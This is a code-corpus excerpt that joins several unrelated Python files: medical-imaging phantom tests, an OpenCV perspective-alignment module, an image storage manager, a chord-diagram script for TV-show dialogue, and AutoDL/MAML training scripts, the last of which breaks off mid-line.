self.assertEqual(self.rois_seen, self.instance.results_data().num_contrast_rois_seen)
def test_results(self):
self.assertIsInstance(self.instance.results(), str)
class LeedsDemo(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
mtf_50 = 1.5
def test_demo(self):
LeedsTOR.run_demo() # shouldn't raise
class LeedsCCW(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
mtf_50 = 1.5
file_name = 'Leeds_ccw.dcm'
class Leeds45Deg(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
invert = True # inverted in v3.0 due to changed default inversion behavior
mtf_50 = 1.9
ssd = 1500
file_name = 'Leeds-45deg.dcm'
class LeedsDirtyEdges(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
mtf_50 = 1.3
ssd = 1000
file_name = 'Leeds-dirty-edges.dcm'
@skip("Phantom appears distorted. MTF locations are different than other phantoms")
class LeedsClosedBlades(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
mtf_50 = 1.3
ssd = 1500
file_name = 'Leeds-closed-blades.dcm'
class LeedsACB1(PlanarPhantomMixin, TestCase):
klass = LeedsTOR
dir_path = ['planar_imaging', 'ACB 1']
file_path = '1.dcm'
mtf_50 = 1.4
class SIQC3Demo(PlanarPhantomMixin, TestCase):
klass = StandardImagingQC3
mtf_50 = 0.53
def test_demo(self):
StandardImagingQC3.run_demo() # shouldn't raise
class SIQC3_1(PlanarPhantomMixin, TestCase):
klass = StandardImagingQC3
file_name = 'QC3-2.5MV.dcm'
mtf_50 = 1.19
class SIQC3_2(PlanarPhantomMixin, TestCase):
klass = StandardImagingQC3
file_name = 'QC3-2.5MV-2.dcm'
mtf_50 = 1.16
def test_wrong_ssd_fails(self):
self.instance = self.klass(self.get_filename())
with self.assertRaises(ValueError):
self.instance.analyze(ssd=1500) # really at 1000
class LasVegasTestMixin(PlanarPhantomMixin):
klass = LasVegas
phantom_angle = 0
def test_plotting(self):
self.instance.plot_analyzed_image()
self.instance.plot_analyzed_image(low_contrast=False)
self.instance.plot_analyzed_image(image=False, low_contrast=False)
def test_angle(self):
self.assertAlmostEqual(self.instance.phantom_angle, self.phantom_angle, delta=1)
class LasVegasDemo(LasVegasTestMixin, TestCase):
rois_seen = 12
def test_demo(self):
LasVegas.run_demo() # shouldn't raise
@skip("Non-cardinal angles no longer supported. If support is re-added these can be reactivated")
class LasVegas10deg(LasVegasTestMixin, TestCase):
file_path = ['TrueBeam 1 - 2364', '2.5MV LV HQ 10deg - ImageRT_2016-10-6 20-12-58.dcm']
phantom_angle = 290
@skip("Non-cardinal angles no longer supported. If support is re-added these can be reactivated")
class LasVegasrotated(LasVegasTestMixin, TestCase):
file_path = ['TrueBeam 1 - 2364', '2.5MV LV HQ side2 - ImageRT_2016-10-6 20-43-3.dcm']
phantom_angle = 284
@skip("Non-cardinal angles no longer supported. If support is re-added these can be reactivated")
class LasVegasTB1(LasVegasTestMixin, TestCase):
file_path = ['TrueBeam 1 - 2364', '6MV LasVegas HQ 0deg - ImageRT_2016-10-6 20-10-17.dcm']
phantom_angle = 284.5
class DoselabMVDemo(PlanarPhantomMixin, TestCase):
klass = DoselabMC2MV
mtf_50 = 0.54
def test_demo(self):
DoselabMC2MV.run_demo()
class DoselabkVDemo(PlanarPhantomMixin, TestCase):
klass = DoselabMC2kV
mtf_50 = 2.16
def test_demo(self):
DoselabMC2kV.run_demo()
class SNCkVDemo(PlanarPhantomMixin, TestCase):
klass = SNCkV
mtf_50 = 1.76
def test_demo(self):
SNCkV.run_demo()
class SNCMVDemo(PlanarPhantomMixin, TestCase):
klass = SNCMV
mtf_50 = 0.43
def test_demo(self):
SNCMV.run_demo()
class SIQCkVDemo(PlanarPhantomMixin, TestCase):
klass = StandardImagingQCkV
mtf_50 = 1.81
def test_demo(self):
StandardImagingQCkV.run_demo()
class PTWEPIDDemo(PlanarPhantomMixin, TestCase):
klass = PTWEPIDQC
mtf_50 = 0.79
def test_demo(self):
PTWEPIDQC.run_demo()
class FC2Mixin(PlanarPhantomMixin):
klass = StandardImagingFC2
dir_path = ['planar_imaging', 'SI FC2']
field_size_x_mm = 150
field_size_y_mm = 150
field_epid_offset_x_mm = 0
field_epid_offset_y_mm = 0
field_bb_offset_x_mm = 0
field_bb_offset_y_mm = 0
fwxm = 50
@classmethod
def setUpClass(cls):
if not cls.file_name:
cls.instance = cls.klass.from_demo_image()
else:
cls.instance = cls.klass(cls.get_filename())
cls.instance.analyze(invert=cls.invert, fwxm=cls.fwxm)
def test_plotting(self):
self.instance.plot_analyzed_image()
def test_field_size(self):
results_data = self.instance.results_data()
assert results_data.field_size_x_mm == pytest.approx(self.field_size_x_mm, abs=0.3)
assert results_data.field_size_y_mm == pytest.approx(self.field_size_y_mm, abs=0.3)
assert results_data.field_epid_offset_x_mm == pytest.approx(self.field_epid_offset_x_mm, abs=0.2)
assert results_data.field_epid_offset_y_mm == pytest.approx(self.field_epid_offset_y_mm, abs=0.2)
assert results_data.field_bb_offset_x_mm == pytest.approx(self.field_bb_offset_x_mm, abs=0.2)
assert results_data.field_bb_offset_y_mm == pytest.approx(self.field_bb_offset_y_mm, abs=0.2)
class FC2Demo(FC2Mixin, TestCase):
klass = StandardImagingFC2
field_size_x_mm = 148.5
field_size_y_mm = 149.1
field_epid_offset_x_mm = -0.7
field_epid_offset_y_mm = 0.3
field_bb_offset_x_mm = -1.2
field_bb_offset_y_mm = 1.2
def test_demo(self):
StandardImagingFC2.run_demo()
class FC210x10_10FFF(FC2Mixin, TestCase):
file_name = 'FC-2-10x10-10fff.dcm'
klass = StandardImagingFC2
field_size_x_mm = 98.7
field_size_y_mm = 99.3
field_epid_offset_x_mm = 0.2
field_bb_offset_y_mm = 0.8
class FC210x10_10X(FC2Mixin, TestCase):
file_name = 'FC-2-10x10-10x.dcm'
klass = StandardImagingFC2
field_size_x_mm = 99.3
field_size_y_mm = 99.6
field_epid_offset_y_mm = 0.2
field_epid_offset_x_mm = -0.5
field_bb_offset_y_mm = 1.1
field_bb_offset_x_mm = -0.8
class FC210x10_15X(FC2Mixin, TestCase):
file_name = 'FC-2-10x10-15x.dcm'
klass = StandardImagingFC2
field_size_x_mm = 99.3
field_size_y_mm = 99.6
field_epid_offset_y_mm = 0.1
field_epid_offset_x_mm = -0.5
field_bb_offset_y_mm = 1.1
field_bb_offset_x_mm = -0.8
class FC215x15_10X(FC2Mixin, TestCase):
file_name = 'FC-2-15x15-10X.dcm'
klass = StandardImagingFC2
field_size_y_mm = 149.2
field_size_x_mm = 149.2
field_epid_offset_y_mm = 0.1
field_epid_offset_x_mm = -0.5
field_bb_offset_y_mm = 1.1
field_bb_offset_x_mm = -0.8
class FC215x15_10FFF(FC2Mixin, TestCase):
file_name = 'FC-2-15x15-10XFFF.dcm'
fwxm = 30
klass = StandardImagingFC2
field_size_y_mm = 149.5
field_size_x_mm = 149.6
field_epid_offset_y_mm = -0.1
field_epid_offset_x_mm = 0.2
field_bb_offset_y_mm = 0.8
field_bb_offset_x_mm = -0.1
``` |
{
"source": "joey5678/flask-restplus-server-example",
"score": 3
} |
#### File: flask-restplus-server-example/cv/align.py
```python
import sys
import os
import cv2
import numpy as np
def getCanny(image, ksize=5, sigmax_y=2, threshold1=12, threshold2=12, apertureSize=0, Canny_border=3):
bordertype = [cv2.BORDER_CONSTANT,cv2.BORDER_REPLICATE,cv2.BORDER_REFLECT,
cv2.BORDER_WRAP,cv2.BORDER_REFLECT_101,cv2.BORDER_TRANSPARENT,cv2.BORDER_ISOLATED][Canny_border]
if ksize % 2 == 0:
ksize += 1
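# cv2.GaussianBlur requires an odd kernel size, hence the adjustment above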
if apertureSize == 0:
apertureSize = 3
else:
apertureSize = 7
threshold1 *= 5
threshold2 *= 5
# msg = "\rksize:[{}],sigmax_y:[{}],threshold1:[{}],threshold2:[{}],apertureSize:[{}], bordertype:[{}]".format(
# ksize,sigmax_y,threshold1,threshold2,apertureSize,bordertype)
# if os.get_terminal_size().columns > len(msg):
# sys.stdout.write(msg)
# else:
# print(msg)
image_ret = cv2.GaussianBlur(image, (ksize, ksize), sigmax_y, sigmax_y, bordertype)
image_ret = cv2.Canny(image_ret, threshold1, threshold2, apertureSize=apertureSize)
kernel = np.ones((ksize, ksize), np.uint8)
image_ret = cv2.dilate(image_ret, kernel, iterations=1)
return image_ret
def getMaxContour(image, mode=1, method=1):
mode_ = [cv2.RETR_EXTERNAL, cv2.RETR_LIST, cv2.RETR_CCOMP, cv2.RETR_TREE][mode]
method_ = [cv2.CHAIN_APPROX_NONE, cv2.CHAIN_APPROX_SIMPLE, cv2.CHAIN_APPROX_TC89_L1, cv2.CHAIN_APPROX_TC89_KCOS][method]
try:
#contours, _ = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
contours, _ = cv2.findContours(image, mode_, method_)
except ValueError:
_, contours, _ = cv2.findContours(image, mode_, method_)
areas = list(map(cv2.contourArea,contours))
try:
max_area = max(areas)
contour = contours[areas.index(max_area)]
except ValueError:
contour = None
return contour
def getBoxPoint(contour,epsilon_k=34 ,Box_close=2):
if contour is None:
return None
close = ([True, True],[False, True],[True,False],[False,False])
hull = cv2.convexHull(contour)
# arcLength(curve, closed) -> retval
if epsilon_k == 0:
k = 0.1
else:
k = 0.1 / epsilon_k
epsilon = k * cv2.arcLength(contour, close[Box_close][0])
approx = cv2.approxPolyDP(hull, epsilon, close[Box_close][1])
approx = approx.reshape((len(approx), 2))
return approx
def orderPoints(pts):
rect = np.zeros((4, 2), dtype="float32")
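# order the corners as top-left, top-right, bottom-right, bottom-left using the
# coordinate sum/difference trick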
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
return rect
def warpImage(image, box):
if box is None:
return image
w, h = pointDistance(box[0], box[1]), \
pointDistance(box[1], box[2])
dst_rect = np.array([[0, 0],
[w - 1, 0],
[w - 1, h - 1],
[0, h - 1]], dtype='float32')
M = cv2.getPerspectiveTransform(box, dst_rect)
warped = cv2.warpPerspective(image, M, (w, h))
return warped
def pointDistance(a, b):
return int(np.sqrt(np.sum(np.square(a - b))))
def get_points(image):
if image is None:
return None
return orderPoints(getBoxPoint(getMaxContour(getCanny(image))))
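# Illustrative usage sketch (not part of the original module); 'photo.jpg' is a hypothetical path:
# img = cv2.imread('photo.jpg')
# box = get_points(img)        # ordered corners of the largest contour
# aligned = warpImage(img, box)  # perspective-corrected crop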
```
#### File: flask-restplus-server-example/mind/manager.py
```python
import sys
import os
import base64
import json
import uuid
from cv.utils import b64toPILImg, save_ocv_image, rawtoOCVImg, rawtoPILImg
Storage_Dir = "img_data"
"""
Save the image and meta-data
"""
class ImageStoreManager():
def __init__(self, saved_dir=Storage_Dir):
self.saved_dir = saved_dir
self.support_formats = ('jpg', 'jpeg', 'png')
def check_format(self, feature_str):
return "jpg"
# return None
def save_opencv_img(self, image, img_id=None, name_prefix=None, format='png'):
uid = img_id if img_id is not None else str(uuid.uuid1())
aligned_tag = "" if img_id is None else "aligned_"
tag = name_prefix.strip() if name_prefix is not None else aligned_tag
tag = f"{tag}_" if not tag.endswith("_") else tag
img_name = f"{tag}sv_image_{uid}.{format}"
save_ocv_image(image, os.path.join(self.saved_dir, img_name))
return uid
def saveb64(self, base64_img=None, img_metadata=None):
if base64_img:
uid = self.save_b64image(base64_img)
if img_metadata:
self.save_metadata(uid, img_metadata)
def save(self, img=None, img_metadata=None):
if img:
uid = self.save_image(img)
if img_metadata:
self.save_metadata(uid, img_metadata)
def save_b64image(self, base64_img):
img_format = self.check_format(base64_img[:20])
if not img_format:
return False
uid = str(uuid.uuid1())
# save image...
image = b64toPILImg(base64_img)
img_name = f"sv_image_{uid}.{img_format}"
image.save(os.path.join(self.saved_dir, img_name))
return uid
def save_image(self, image, img_format='png'):
uid = str(uuid.uuid1())
# save image...
img_name = f"sv_image_{uid}.{img_format}"
image.save(os.path.join(self.saved_dir, img_name))
return uid
def save_metadata(self, uid, img_metadata):
js_file = f"sv_meta_{uid}.json"
try:
with open(os.path.join(self.saved_dir, js_file), 'w') as f:
json.dump(img_metadata, f)
except:
print("Fail to write metadata into json file ")
def get_image(self, image_id, img_format='png'):
data = None
img_name = f"sv_image_{image_id}.{img_format}"
if os.path.isfile(os.path.join(self.saved_dir, img_name)):
with open(os.path.join(self.saved_dir, img_name), 'rb') as f:
data = f.read()
return data
def get_OCV_image(self, image_id, img_format='png'):
data = self.get_image(image_id, img_format)
return None if data is None else rawtoOCVImg(data)
def get_PIL_image(self, image_id, img_format='png'):
data = self.get_image(image_id, img_format)
return None if data is None else rawtoPILImg(data)
img_store_manager = ImageStoreManager()
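# Illustrative usage sketch (not part of the original module); base64_str is a hypothetical
# base64-encoded image string:
# uid = img_store_manager.save_b64image(base64_str)
# img_store_manager.save_metadata(uid, {'source': 'upload'})
# pil_img = img_store_manager.get_PIL_image(uid, img_format='jpg')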
``` |
{
"source": "Joey5729/ATLA-Line-Visualization",
"score": 3
} |
#### File: Joey5729/ATLA-Line-Visualization/project.py
```python
import os
import chord
# credit to Dr. <NAME>, creator of the chord package
# https://github.com/shahinrostami/chord
def main():
# retrieve list of episode files
fileList = os.listdir('episodes/')
lineList = []
# extract the lines from files in episode list
for f in fileList:
with open('episodes/' + f) as fOb:
for line in fOb:
lineList.append(line.strip())
# set up the lists used
codeList = ['a', 'k', 's', 't', 'z', 'i', 'az', 'o', 'm', 'ty', 'su']
names = ['Aang', 'Katara', 'Sokka', 'Toph', 'Zuko', 'Iroh', 'Azula', 'Ozai', 'Mai', '<NAME>', 'Suki']
colorList = ['#fff81f', '#6eddff', '#1690b5', '#0dd610', '#ff0000', '#ffaa00', '#590069', '#804f00', '#1c0000', '#ed009a', '#80ff00']
matrix = [
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0],
]
# parse over the list of lines, filling the matrix
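# each line is expected to look like "a,k": two speaker codes from codeList separated by a comma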
for line in lineList:
chars = line.split(',')
matrix[codeList.index(chars[0])][codeList.index(chars[1])] += 1
matrix[codeList.index(chars[1])][codeList.index(chars[0])] += 1
# yay we're done
#printMatrix(matrix, names)
chord.Chord(matrix, names, wrap_labels = 0, colors = colorList).to_html()
# debug function
def printMatrix(matrix, names):
print(end = '\t')
for name in names:
print(name, end = '\t')
print()
for y in matrix:
print(names[matrix.index(y)], end = '\t')
for x in y:
print (x, end = '\t')
print()
# very important
main()
``` |
{
"source": "Joey61Liuyi/AutoDL-Projects",
"score": 2
} |
#### File: exps/basic/basic-eval.py
```python
import os, sys, time, torch, random, argparse
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
from copy import deepcopy
from xautodl.config_utils import load_config, dict2config
from xautodl.procedures import get_procedures, get_optim_scheduler
from xautodl.datasets import get_datasets
from xautodl.models import obtain_model
from xautodl.utils import get_model_infos
from xautodl.log_utils import PrintLogger, time_string
def main(args):
assert os.path.isdir(args.data_path), "invalid data-path : {:}".format(
args.data_path
)
assert os.path.isfile(args.checkpoint), "invalid checkpoint : {:}".format(
args.checkpoint
)
checkpoint = torch.load(args.checkpoint)
xargs = checkpoint["args"]
train_data, valid_data, xshape, class_num = get_datasets(
xargs.dataset, args.data_path, xargs.cutout_length
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=xargs.batch_size,
shuffle=False,
num_workers=xargs.workers,
pin_memory=True,
)
logger = PrintLogger()
model_config = dict2config(checkpoint["model-config"], logger)
base_model = obtain_model(model_config)
flop, param = get_model_infos(base_model, xshape)
logger.log("model ====>>>>:\n{:}".format(base_model))
logger.log("model information : {:}".format(base_model.get_message()))
logger.log("-" * 50)
logger.log(
"Params={:.2f} MB, FLOPs={:.2f} M ... = {:.2f} G".format(
param, flop, flop / 1e3
)
)
logger.log("-" * 50)
logger.log("valid_data : {:}".format(valid_data))
optim_config = dict2config(checkpoint["optim-config"], logger)
_, _, criterion = get_optim_scheduler(base_model.parameters(), optim_config)
logger.log("criterion : {:}".format(criterion))
base_model.load_state_dict(checkpoint["base-model"])
_, valid_func = get_procedures(xargs.procedure)
logger.log("initialize the CNN done, evaluate it using {:}".format(valid_func))
network = torch.nn.DataParallel(base_model).cuda()
try:
valid_loss, valid_acc1, valid_acc5 = valid_func(
valid_loader,
network,
criterion,
optim_config,
"pure-evaluation",
xargs.print_freq_eval,
logger,
)
except:
_, valid_func = get_procedures("basic")
valid_loss, valid_acc1, valid_acc5 = valid_func(
valid_loader,
network,
criterion,
optim_config,
"pure-evaluation",
xargs.print_freq_eval,
logger,
)
num_bytes = torch.cuda.max_memory_cached(next(network.parameters()).device) * 1.0
logger.log(
"***{:s}*** EVALUATION loss = {:.6f}, accuracy@1 = {:.2f}, accuracy@5 = {:.2f}, error@1 = {:.2f}, error@5 = {:.2f}".format(
time_string(),
valid_loss,
valid_acc1,
valid_acc5,
100 - valid_acc1,
100 - valid_acc5,
)
)
logger.log(
"[GPU-Memory-Usage on {:} is {:} bytes, {:.2f} KB, {:.2f} MB, {:.2f} GB.]".format(
next(network.parameters()).device,
int(num_bytes),
num_bytes / 1e3,
num_bytes / 1e6,
num_bytes / 1e9,
)
)
logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser("Evaluate-CNN")
parser.add_argument("--data_path", type=str, help="Path to dataset.")
parser.add_argument(
"--checkpoint", type=str, help="Choose between Cifar10/100 and ImageNet."
)
args = parser.parse_args()
assert torch.cuda.is_available(), "torch.cuda is not available"
main(args)
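# Hedged usage sketch (added; the paths below are hypothetical examples, not taken from
# the repository docs):
#   python exps/basic/basic-eval.py \
#       --data_path $TORCH_HOME/cifar.python \
#       --checkpoint ./output/basic/cifar10/checkpoint/seed-1-best.pth
# The checkpoint is expected to contain the "args", "model-config", "optim-config", and
# "base-model" entries that main() reads above.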
```
#### File: exps/basic/xmain.py
```python
import os, sys, time, torch, random, argparse
from copy import deepcopy
from pathlib import Path
lib_dir = (Path(__file__).parent / ".." / "..").resolve()
print("LIB-DIR: {:}".format(lib_dir))
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
from xautodl import xmisc
def main(args):
train_data = xmisc.nested_call_by_yaml(args.train_data_config, args.data_path)
valid_data = xmisc.nested_call_by_yaml(args.valid_data_config, args.data_path)
logger = xmisc.Logger(args.save_dir, prefix="seed-{:}-".format(args.rand_seed))
logger.log("Create the logger: {:}".format(logger))
logger.log("Arguments : -------------------------------")
for name, value in args._get_kwargs():
logger.log("{:16} : {:}".format(name, value))
logger.log("Python Version : {:}".format(sys.version.replace("\n", " ")))
logger.log("PyTorch Version : {:}".format(torch.__version__))
logger.log("cuDNN Version : {:}".format(torch.backends.cudnn.version()))
logger.log("CUDA available : {:}".format(torch.cuda.is_available()))
logger.log("CUDA GPU numbers : {:}".format(torch.cuda.device_count()))
logger.log(
"CUDA_VISIBLE_DEVICES : {:}".format(
os.environ["CUDA_VISIBLE_DEVICES"]
if "CUDA_VISIBLE_DEVICES" in os.environ
else "None"
)
)
logger.log("The training data is:\n{:}".format(train_data))
logger.log("The validation data is:\n{:}".format(valid_data))
model = xmisc.nested_call_by_yaml(args.model_config)
logger.log("The model is:\n{:}".format(model))
logger.log("The model size is {:.4f} M".format(xmisc.count_parameters(model)))
train_loader = torch.utils.data.DataLoader(
train_data,
batch_sampler=xmisc.BatchSampler(train_data, args.batch_size, args.steps),
num_workers=args.workers,
pin_memory=True,
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=args.batch_size,
shuffle=False,
num_workers=args.workers,
pin_memory=True,
drop_last=False,
)
iters_per_epoch = len(train_data) // args.batch_size
logger.log("The training loader: {:}".format(train_loader))
logger.log("The validation loader: {:}".format(valid_loader))
optimizer = xmisc.nested_call_by_yaml(
args.optim_config,
model.parameters(),
lr=args.lr,
weight_decay=args.weight_decay,
)
objective = xmisc.nested_call_by_yaml(args.loss_config)
metric = xmisc.nested_call_by_yaml(args.metric_config)
logger.log("The optimizer is:\n{:}".format(optimizer))
logger.log("The objective is {:}".format(objective))
logger.log("The metric is {:}".format(metric))
logger.log(
"The iters_per_epoch = {:}, estimated epochs = {:}".format(
iters_per_epoch, args.steps // iters_per_epoch
)
)
model, objective = torch.nn.DataParallel(model).cuda(), objective.cuda()
scheduler = xmisc.LRMultiplier(
optimizer, xmisc.get_scheduler(args.scheduler, args.lr), args.steps
)
start_time, iter_time = time.time(), xmisc.AverageMeter()
for xiter, data in enumerate(train_loader):
need_time = "Time Left: {:}".format(
xmisc.time_utils.convert_secs2time(
iter_time.avg * (len(train_loader) - xiter), True
)
)
iter_str = "{:6d}/{:06d}".format(xiter, len(train_loader))
inputs, targets = data
targets = targets.cuda(non_blocking=True)
model.train()
optimizer.zero_grad()
outputs = model(inputs)
loss = objective(outputs, targets)
loss.backward()
optimizer.step()
scheduler.step()
if xiter % iters_per_epoch == 0:
logger.log("TRAIN [{:}] loss = {:.6f}".format(iter_str, loss.item()))
# measure elapsed time
iter_time.update(time.time() - start_time)
start_time = time.time()
logger.log("-" * 200 + "\n")
logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Train a classification model with a loss function.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--save_dir", type=str, help="Folder to save checkpoints and log."
)
parser.add_argument("--resume", type=str, help="Resume path.")
parser.add_argument("--init_model", type=str, help="The initialization model path.")
parser.add_argument("--model_config", type=str, help="The path to the model config")
parser.add_argument("--optim_config", type=str, help="The optimizer config file.")
parser.add_argument("--loss_config", type=str, help="The loss config file.")
parser.add_argument("--metric_config", type=str, help="The metric config file.")
parser.add_argument(
"--train_data_config", type=str, help="The training dataset config path."
)
parser.add_argument(
"--valid_data_config", type=str, help="The validation dataset config path."
)
parser.add_argument("--data_path", type=str, help="The path to the dataset.")
# Optimization options
parser.add_argument("--lr", type=float, help="The learning rate")
parser.add_argument("--weight_decay", type=float, help="The weight decay")
parser.add_argument("--scheduler", type=str, help="The scheduler indicator.")
parser.add_argument("--steps", type=int, help="The total number of steps.")
parser.add_argument("--batch_size", type=int, default=256, help="The batch size.")
parser.add_argument("--workers", type=int, default=4, help="The number of workers")
# Random Seed
parser.add_argument("--rand_seed", type=int, default=-1, help="manual seed")
args = parser.parse_args()
if args.rand_seed is None or args.rand_seed < 0:
args.rand_seed = random.randint(1, 100000)
if args.save_dir is None:
raise ValueError("The save-path argument can not be None")
main(args)
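# Hedged usage sketch (added; every config path and value below is a hypothetical
# placeholder for illustration):
#   python exps/basic/xmain.py --save_dir ./outputs/xmain-demo --data_path ./data \
#       --model_config cfgs/model.yaml --optim_config cfgs/optim.yaml \
#       --loss_config cfgs/loss.yaml --metric_config cfgs/metric.yaml \
#       --train_data_config cfgs/train.yaml --valid_data_config cfgs/valid.yaml \
#       --lr 0.1 --weight_decay 5e-4 --scheduler cos --steps 10000
# Each *_config YAML is resolved through xmisc.nested_call_by_yaml, which is assumed here
# to describe a callable plus its keyword arguments.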
```
#### File: GeMOSA/baselines/maml-ft.py
```python
import sys, time, copy, torch, random, argparse
from tqdm import tqdm
from copy import deepcopy
from pathlib import Path
lib_dir = (Path(__file__).parent / ".." / ".." / "..").resolve()
print(lib_dir)
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
from xautodl.procedures import (
prepare_seed,
prepare_logger,
save_checkpoint,
copy_checkpoint,
)
from xautodl.log_utils import time_string
from xautodl.log_utils import AverageMeter, convert_secs2time
from xautodl.procedures.metric_utils import SaveMetric, MSEMetric, Top1AccMetric
from xautodl.datasets.synthetic_core import get_synthetic_env
from xautodl.models.xcore import get_model
from xautodl.xlayers import super_core
class MAML:
"""A LFNA meta-model that uses the MLP as delta-net."""
def __init__(
self, network, criterion, epochs, meta_lr, inner_lr=0.01, inner_step=1
):
self.criterion = criterion
self.network = network
self.meta_optimizer = torch.optim.Adam(
self.network.parameters(), lr=meta_lr, amsgrad=True
)
self.inner_lr = inner_lr
self.inner_step = inner_step
self._best_info = dict(state_dict=None, iepoch=None, score=None)
print("There are {:} weights.".format(self.network.get_w_container().numel()))
def adapt(self, x, y):
# create a container for the future timestamp
container = self.network.get_w_container()
for k in range(0, self.inner_step):
y_hat = self.network.forward_with_container(x, container)
loss = self.criterion(y_hat, y)
grads = torch.autograd.grad(loss, container.parameters())
container = container.additive([-self.inner_lr * grad for grad in grads])
return container
def predict(self, x, container=None):
if container is not None:
y_hat = self.network.forward_with_container(x, container)
else:
y_hat = self.network(x)
return y_hat
def step(self):
torch.nn.utils.clip_grad_norm_(self.network.parameters(), 1.0)
self.meta_optimizer.step()
def zero_grad(self):
self.meta_optimizer.zero_grad()
def load_state_dict(self, state_dict):
self.criterion.load_state_dict(state_dict["criterion"])
self.network.load_state_dict(state_dict["network"])
self.meta_optimizer.load_state_dict(state_dict["meta_optimizer"])
def state_dict(self):
state_dict = dict()
state_dict["criterion"] = self.criterion.state_dict()
state_dict["network"] = self.network.state_dict()
state_dict["meta_optimizer"] = self.meta_optimizer.state_dict()
return state_dict
def save_best(self, score):
success, best_score = self.network.save_best(score)
return success, best_score
def load_best(self):
self.network.load_best()
def main(args):
prepare_seed(args.rand_seed)
logger = prepare_logger(args)
train_env = get_synthetic_env(mode="train", version=args.env_version)
valid_env = get_synthetic_env(mode="valid", version=args.env_version)
trainval_env = get_synthetic_env(mode="trainval", version=args.env_version)
test_env = get_synthetic_env(mode="test", version=args.env_version)
all_env = get_synthetic_env(mode=None, version=args.env_version)
logger.log("The training enviornment: {:}".format(train_env))
logger.log("The validation enviornment: {:}".format(valid_env))
logger.log("The trainval enviornment: {:}".format(trainval_env))
logger.log("The total enviornment: {:}".format(all_env))
logger.log("The test enviornment: {:}".format(test_env))
model_kwargs = dict(
config=dict(model_type="norm_mlp"),
input_dim=all_env.meta_info["input_dim"],
output_dim=all_env.meta_info["output_dim"],
hidden_dims=[args.hidden_dim] * 2,
act_cls="relu",
norm_cls="layer_norm_1d",
)
model = get_model(**model_kwargs)
model = model.to(args.device)
if all_env.meta_info["task"] == "regression":
criterion = torch.nn.MSELoss()
metric_cls = MSEMetric
elif all_env.meta_info["task"] == "classification":
criterion = torch.nn.CrossEntropyLoss()
metric_cls = Top1AccMetric
else:
raise ValueError(
"This task ({:}) is not supported.".format(all_env.meta_info["task"])
)
maml = MAML(
model, criterion, args.epochs, args.meta_lr, args.inner_lr, args.inner_step
)
# meta-training
last_success_epoch = 0
per_epoch_time, start_time = AverageMeter(), time.time()
for iepoch in range(args.epochs):
need_time = "Time Left: {:}".format(
convert_secs2time(per_epoch_time.avg * (args.epochs - iepoch), True)
)
head_str = (
"[{:}] [{:04d}/{:04d}] ".format(time_string(), iepoch, args.epochs)
+ need_time
)
maml.zero_grad()
meta_losses = []
for ibatch in range(args.meta_batch):
future_idx = random.randint(0, len(trainval_env) - 1)
future_t, (future_x, future_y) = trainval_env[future_idx]
# -->>
seq_times = trainval_env.get_seq_times(future_idx, args.seq_length)
_, (allxs, allys) = trainval_env.seq_call(seq_times)
allxs, allys = allxs.view(-1, allxs.shape[-1]), allys.view(-1, 1)
if trainval_env.meta_info["task"] == "classification":
allys = allys.view(-1)
historical_x, historical_y = allxs.to(args.device), allys.to(args.device)
future_container = maml.adapt(historical_x, historical_y)
future_x, future_y = future_x.to(args.device), future_y.to(args.device)
future_y_hat = maml.predict(future_x, future_container)
future_loss = maml.criterion(future_y_hat, future_y)
meta_losses.append(future_loss)
meta_loss = torch.stack(meta_losses).mean()
meta_loss.backward()
maml.step()
logger.log(head_str + " meta-loss: {:.4f}".format(meta_loss.item()))
success, best_score = maml.save_best(-meta_loss.item())
if success:
logger.log("Achieve the best with best_score = {:.3f}".format(best_score))
save_checkpoint(maml.state_dict(), logger.path("model"), logger)
last_success_epoch = iepoch
if iepoch - last_success_epoch >= args.early_stop_thresh:
logger.log("Early stop at {:}".format(iepoch))
break
per_epoch_time.update(time.time() - start_time)
start_time = time.time()
# meta-test
maml.load_best()
def finetune(index):
seq_times = test_env.get_seq_times(index, args.seq_length)
_, (allxs, allys) = test_env.seq_call(seq_times)
allxs, allys = allxs.view(-1, allxs.shape[-1]), allys.view(-1, 1)
if test_env.meta_info["task"] == "classification":
allys = allys.view(-1)
historical_x, historical_y = allxs.to(args.device), allys.to(args.device)
future_container = maml.adapt(historical_x, historical_y)
historical_y_hat = maml.predict(historical_x, future_container)
train_metric = metric_cls(True)
# model.analyze_weights()
with torch.no_grad():
train_metric(historical_y_hat, historical_y)
train_results = train_metric.get_info()
return train_results, future_container
metric = metric_cls(True)
per_timestamp_time, start_time = AverageMeter(), time.time()
for idx, (future_time, (future_x, future_y)) in enumerate(test_env):
need_time = "Time Left: {:}".format(
convert_secs2time(per_timestamp_time.avg * (len(test_env) - idx), True)
)
logger.log(
"[{:}]".format(time_string())
+ " [{:04d}/{:04d}]".format(idx, len(test_env))
+ " "
+ need_time
)
# build optimizer
train_results, future_container = finetune(idx)
future_x, future_y = future_x.to(args.device), future_y.to(args.device)
future_y_hat = maml.predict(future_x, future_container)
future_loss = criterion(future_y_hat, future_y)
metric(future_y_hat, future_y)
log_str = (
"[{:}]".format(time_string())
+ " [{:04d}/{:04d}]".format(idx, len(test_env))
+ " train-score: {:.5f}, eval-score: {:.5f}".format(
